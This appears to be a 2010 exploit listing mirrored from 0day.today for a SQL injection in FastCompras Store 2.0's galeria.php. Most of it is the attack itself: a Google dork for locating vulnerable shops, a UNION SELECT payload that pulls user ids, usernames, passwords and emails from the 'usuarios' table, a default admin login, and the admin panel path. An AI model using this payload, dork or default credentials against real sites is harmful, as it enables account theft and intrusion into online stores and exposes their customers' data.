FastCompras Store (galeria.php) E-Commerce SQL Injection Vulnerability

🗓️ 20 Sep 2010 00:00:00Reported by _mlk_Type
zdt🔗 0day.today👁 18 Views
FastCompras Store (galeria.php) E-Commerce SQL Injection Vulnerability. WebApps, Google dork, Windows, *nix, PHP, FastCompras Store Manager 2.
======================================================================
FastCompras Store (galeria.php) E-Commerce SQL Injection Vulnerability
======================================================================

# Exploit Title: FastCompras Store  (galeria.php nome) E-Commerce
# Author:  _mlk_
# Software: http://www.fastcompras.com.br/
# Version: 2.0
# Category:: WebApps
# Google dork: "Loja Virtual desenvolvida por FastCompras"
# Tested on: Windows & *nix




FastCompras Store  (galeria.php nome) E-Commerce

||======================================================================================================================||
||                                                                                                                      ||
||                                       [+] Encontrado por : _mlk_                                                     ||
||                                                                                                                      ||
||======================================================================================================================||
||                                                                                                                      ||
||      [-] InformaÐ·Ñ…es                                                                                                 ||
||                                                                                                                      ||
||  [+] Script :  FastCompras Store                                                                                     ||
||                                                                                                                      ||
||  [+] Linguagem :  PHP                                                                                                ||
||                                                                                                                      ||
||  [+] Desenvolvedor :  http://www.fastcompras.com.br/                                                                 ||
||                                                                                                                      ||
||  [+] Dork :  "Loja Virtual desenvolvida por FastCompras"                                                             ||
||                                                                                                                      ||
||  [+] String :  "galeria.php?nome=SEÐ—Ð“O&categoria=1"                                                                  ||
||                                                                                                                      ||
||  [+] VersÐ³o : FastCompras Store Manager 2.0 (No Captcha)                                                             ||
||                                                                                                                      ||
||  [+] Data Encontrada :  23/05/10 (Brasil)                                                                            ||
||                                                                                                                      ||
||======================================================================================================================||
||                                                                                                                      ||
||  [&] Agradecimentos :                                                                                                ||
||                                                                                                                      ||
||       Deus , Familia e Amigos                                                                                        ||
||                                                                                                                      ||
||======================================================================================================================||
||                                                                                                                      ||
||     [*] Exemplo :                                                                                                    ||
||                                                                                                                      ||
||         http://localhost/galeria.php?nome=SEÐ—Ð“O&categoria=1 [SQL-EVIL]                                               ||
||         http://localhost/[path]/galeria.php?nome=SEÐ—Ð“O&categoria=1 [SQL-EVIL]                                        ||
||                                                                                                                      ||
||                                                                                                                      ||
||      ----------------------------------------------------------------------------------------------------------      ||
||                                                                                                                      ||
||                                                                                                                      ||
||     [*] Exploit :                                                                                                    ||
||                                                                                                                      ||
||         +union+select+concat(id_usuario,nome,nome_usuario,senha,perfil,email,data_cadastro,ativo)+from+usuarios--    ||
||                                                                                                                      ||
||                                                                                                                      ||
||      ----------------------------------------------------------------------------------------------------------      ||
||                                                                                                                      ||
||                                                                                                                      ||
||      [*] Demo :                                                                                                      ||
||                                                                                                                      ||
||          http://localhost/galeria.php?nome=SECOES&categoria=-1+union+select+colunas+from+usuarios--                  ||
||                                                                                                                      ||
||                                                                                                                      ||
||      ----------------------------------------------------------------------------------------------------------      ||
||                                                                                                                      ||
||                                                                                                                      ||
||      [*] Usuario PadrÐ³o :                                                                                            ||
||                                                                                                                      ||
||          admin / 1q2w3e                                                                                              ||
||                                                                                                                      ||
||                                                                                                                      ||
||      ----------------------------------------------------------------------------------------------------------      ||
||                                                                                                                      ||
||                                                                                                                      ||
||      [*] Painel :                                                                                                    ||
||                                                                                                                      ||
||          http://localhost/manager/content/index.php                                                                  ||
||                                                                                                                      ||
||======================================================================================================================||



#  0day.today [2018-03-19]  #
20 Sep 2010 00:00Current
7.1High risk
Vulners AI Score7.1